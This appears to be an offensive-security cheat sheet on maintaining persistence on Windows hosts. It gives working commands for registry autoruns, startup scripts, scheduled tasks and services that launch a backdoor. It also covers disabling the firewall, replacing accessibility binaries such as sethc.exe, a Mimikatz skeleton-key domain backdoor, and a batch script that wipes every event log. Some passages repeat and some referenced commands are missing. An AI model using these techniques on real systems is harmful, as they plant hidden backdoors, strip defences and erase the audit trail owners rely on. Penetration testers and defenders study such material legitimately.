Various techniques for maintaining persistence. Includes methods that can be accomplished both with and without elevated privileges. Will provide commands for both cmd.exe and PowerShell if possible.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Tools
Has numerous modules built-in to automate many different persistence methods
TODO: add tab to each applicable method below
-
Powershell module which writes registry keys that execute a backdoor payload of your choice when a certain Windows binary loads or closes (in this case notepad.exe).
As a Low-Privilege User:
Set a file as hidden
Set a file as Hidden. This can also be used to change other file property flags such as Archive and ReadOnly
$file = (Get-ChildItem $file_to_change) #can shorten command with gci or ls
$file.attributes #Show the files attributes
#Normal
#Flip the bit of the Hidden attribute
$file.attributes = $file.Attributes -bxor ([System.IO.FileAttributes]::Hidden)
$file.attributes
#Hidden
#To remove the 'Hidden' attribute
$file.attributes = $file.Attributes -bxor ([System.IO.FileAttributes]::Hidden)
$file.attributes
#Normal
Set a file as Hidden (-h). This can also be used to change other file property flags such as (a) Archive and (r) ReadOnly. Flags must be added separately (-h -a -r not -har).
attrib <C:\path\filename> #show the file attributes
attrib +h <C:\path\filename>
#to remove the hidden property
attrib -h <C:\path\filename>
Registry - HKCU
Autoruns
The following registry keys can be used to create persistence by auto-running your backdoor. Keys in HKCU do not require elevation to modify.
Create key values in the Autoruns keys in HKCU:\Software\Microsoft\Windows\CurrentVersion.
Run and RunOnce keys are run each time a new user logs in.
RunServices and RunServicesOnce are run in the background when the logon dialog box first appears or at this stage of the boot process if there is no logon.
Create values in the Autoruns keys in HKCU\Software\Microsoft\Windows\CurrentVersion. The option /v is the name you want, and /d is the path to your backdoor.
Run and RunOnce keys are run each time a new user logs in.
RunServices and RunServicesOnce are run in the background when the logon dialog box first appears or at this stage of the boot process if there is no logon.
By default, the value of a RunOnce key is deleted before the command line is run. You can prefix a RunOnce value name with an exclamation point (!) to defer deletion of the value until after the command runs. Without the exclamation point prefix, if the RunOnce operation fails the associated program will not be asked to run the next time you start the computer.
By default, these keys are ignored when the computer is started in Safe Mode. The value name of RunOnce keys can be prefixed with an asterisk (*) to force the program to run even in Safe mode.
Persistence via cmd.exe
If you want a defined set of commands to run every time a command prompt is launched, you can specify an init script in the Command Processor AutoRun registry value. Use an expandable string value (REG_EXPAND_SZ), which allows you to use environment variables like %USERPROFILE%.
Then create a file called init.cmd in your %USERPROFILE% folder:
@echo off
command_A
command_B
...
These commands will be run every time a cmd prompt is started.
Warning!
This can cause an infinite loop if your init.cmd causes another cmd window to be launched, as each one will again run all of the commands in the init file!
Create a batch script in the user startup folder to run when the user logs in.
Create start.ps1 in "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\". Then have this PowerShell script call your backdoor in $env:USERPROFILE\AppData\Local\Temp\.
Create .bat in "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\". Then have this batch file call your backdoor in %USERPROFILE%\AppData\Local\Temp\.
A better alternative would be to create a .lnk file in the startup folder which points to your script in another location. This may be more OPSEC-safe, especially if the link is disguised. Use the PowerShell script linked below to create a (potentially hidden?) .lnk file using an icon appropriate for the environment:
Scheduled Tasks
These commands will allow your backdoor to be run when the specified user logs into the machine. Combined with the cmd init autorun above this scheduled task could do something helpful or innocuous to avoid suspicion.
This command will allow your backdoor to be run at a specified time. Combined with the cmd init autorun above this scheduled task could do something helpful or innocuous to avoid suspicion.
/F - forcefully creates the task and suppresses warnings if the task exists
/RU - Specifies the user context under which the task runs - System
/SC – Frequency of schedule – Daily
/ST – Time the task starts – 10:51
/TN – Name of the task – Updater
/TR – Path and filename of the executable to run - C:\backdoor.exe
Windows Services
May need some privileges for Windows services...
As an Elevated-Privilege User
All commands below this header require some sort of elevated account privileges. As I discover them, I will add which specific Windows privileges are required.
Windows Firewall
Disabling Windows Firewall
To view the state and settings of all Windows firewall profiles (this output is not as pretty as the netsh command from cmd.exe, but can be manipulated like any PowerShell object):
Get-NetFirewallProfile
To disable the Windows firewall for all network profiles:
If you only want to disable the firewall for a specific profile, you can remove the profile name (Domain, Public, or Private) from the command. This can be useful if you are unable to fully disable the firewall.
To view the states of all firewall profiles, and then disable all of them:
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off
If you cannot turn off all profiles, try each individual profile:
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off
These commands can also be used in PowerShell.
Create firewall rules
TODO: add more
New-NetFirewallRule -Name $rule_name -DisplayName $rule_name -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress $attackers_IP
Create key values in the Autoruns keys in HKCU:\Software\Microsoft\Windows\CurrentVersion.
Run and RunOnce keys are run each time a new user logs in.
RunServices and RunServicesOnce are run in the background when the logon dialog box first appears or at this stage of the boot process if there is no logon.
Create values in the Autoruns keys in HKCU\Software\Microsoft\Windows\CurrentVersion. The option /v is the name you want, and /d is the path to your backdoor. Run and RunOnce keys are run each time a new user logs in. RunServices and RunServicesOnce are run in the background when the logon dialog box first appears or at this stage of the boot process if there is no logon.
By default, the value of a RunOnce key is deleted before the command line is run. You can prefix a RunOnce value name with an exclamation point (!) to defer deletion of the value until after the command runs. Without the exclamation point prefix, if the RunOnce operation fails the associated program will not be asked to run the next time you start the computer.
By default, these keys are ignored when the computer is started in Safe Mode. The value name of RunOnce keys can be prefixed with an asterisk (*) to force the program to run even in Safe mode.
Create a service that can start automatically or on-demand as needed.
New-Service -Name "AppReadiness" -BinaryPathName "$backdoor_path" -Description "Gets apps ready for use the first time a user signs in to this PC and when adding new apps."
TODO: add more
Execute (remote) commands with DCOM
Win32_DCOMApplication class. This COM object allows you to script components of MMC snap-in operations.
For this to work, you must also be local administrator of the remote system, Windows Defender must be bypassed or disabled, and (to do this remotely) the Windows Advanced Security Firewall must have the following rules enabled:
COM+ Network Access (port 135)
A rule to let dynamic ports for C:\windows\system32\mmc.exe in. Regular RPC-EPMAP rules from other services won’t work as they only allow traffic to svchost.exe.
If the firewall doesn’t let you in, you may receive messages such as:
Exception calling “CreateInstance” with “1” argument(s): “Retrieving the COM class factory for remote component with CLSID {C08AFD90-F2A1-11D1-8455-00A0C91F3880} from machine target failed due to the following error: 800706ba target.”
The ShellExecute method of the object takes 4 parameters:
The complete path to the executable
The directory to be considered as current directory; you may want to usually pass NULL
A list of arguments to pass along to the executable. In case there is none, you can also pass NULL
The state of the windows (1 - Normal, 3 - maximized, 7 - minimized).
Usually, you will want to use 7 as a value (minimized). You do not get any output back.
Replacing Windows Binaries
Replace these binaries with your backdoor to enable easy persistence with minimal interference with normal users. However, beware using these on systems where the user needs these accessibility tools!
Feature
Executable
Sticky Keys
C:\Windows\System32\sethc.exe
Accessibility Menu
C:\Windows\System32\utilman.exe
On-Screen Keyboard
C:\Windows\System32\osk.exe
Magnifier
C:\Windows\System32\Magnify.exe
Narrator
C:\Windows\System32\Narrator.exe
Display Switcher
C:\Windows\System32\DisplaySwitch.exe
App Switcher
C:\Windows\System32\AtBroker.exe
In Metasploit : use post/windows/manage/sticky_keys
In addition to the older backdoor-able Windows binaries, in Windows 10 you can exploit a DLL hijacking vulnerability in the On-Screen Keyboard executable 'osk.exe' by creating a malicious HID.dll in C:\Program Files\Common Files\microsoft shared\ink\HID.dll.
Enable RDP on a remote host with PowerShell:
Remove the -ComputerName $computername property to run on the local machine.
After adding this registry key, RDP or physically log into the machine. At the login screen, press Win+U to get a cmd.exe prompt as NT AUTHORITY\SYSTEM.
After adding this registry key, RDP or physically log into the machine. At the login screen, repeatedly press F5 when you are at the login screen to get a cmd.exe prompt as NT AUTHORITY\SYSTEM.
Mimikatz gives you the opportunity to backdoor an entire domain at once by using the skeleton key module. This must be run by a user with Domain Admin credentials to work properly.
# Exploitation Command (run as Domain Admin):
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName $FQDN_of_DC
# Login using the password "mimikatz"
Enter-PSSession -ComputerName $ComputerName -Credential $Domain\$UserName
Clear Windows Event Logs
Generates Windows event 1102 when you clear logs!
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo All Event Logs have been cleared!
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo Current user permissions to execute this .BAT file are inadequate.
echo This .BAT file must be run with administrative privileges.
echo Exit now, right click on this .BAT file, and select "Run as administrator".
pause >nul
:theEnd
Exit
Unblock-File -Path "<C:\Path\to\blocked\file>"
Legacy Windows Log format
The Clear-EventLog cmdlet deletes all of the entries from the specified event logs on the local computer or on remote computers. To use Clear-EventLog, you must be a member of the Administrators group on the affected computer.
-List Displays the list of event logs on the computer.
To list logs on other systems
Get-EventLog -LogName System -ComputerName Server01, Server02, Server03
If the ComputerName parameter isn't specified, Get-EventLog defaults to the local computer. The parameter also accepts a dot (.) to specify the local computer. The ComputerName parameter doesn't rely on Windows PowerShell remoting, so you can use this even if your computer is not configured to run remote commands.
The Remove-EventLog cmdlet deletes an event log file from a local or remote computer and unregisters all its event sources for the log. You can also use this cmdlet to unregister event sources without deleting any event logs.
Get-EventLog uses a Win32 API that is deprecated so the results may not be accurate. Use the Get-WinEvent cmdlet instead on systems running Windows Vista+.
List updated log formats in Windows Vista+
Get-WinEvent -ListLog *
Warning! information overload! Lists each individual windows event rather than the log files
To clear all logs at once
Lists all of the non-empty logfiles, then clears each one.
Legacy command (may not be completely accurate in Windows Vista+)
This process can be automated by using PowerShell module from .
The first argument represents AllowTSConnections(0 – disable, 1 – enable) and the second one represents ModifyFirewallException (0 – don’t modify firewall rules, 1 – modify firewall rules). You can read more about it at
-
-
-
If you like this content and would like to see more, please consider !
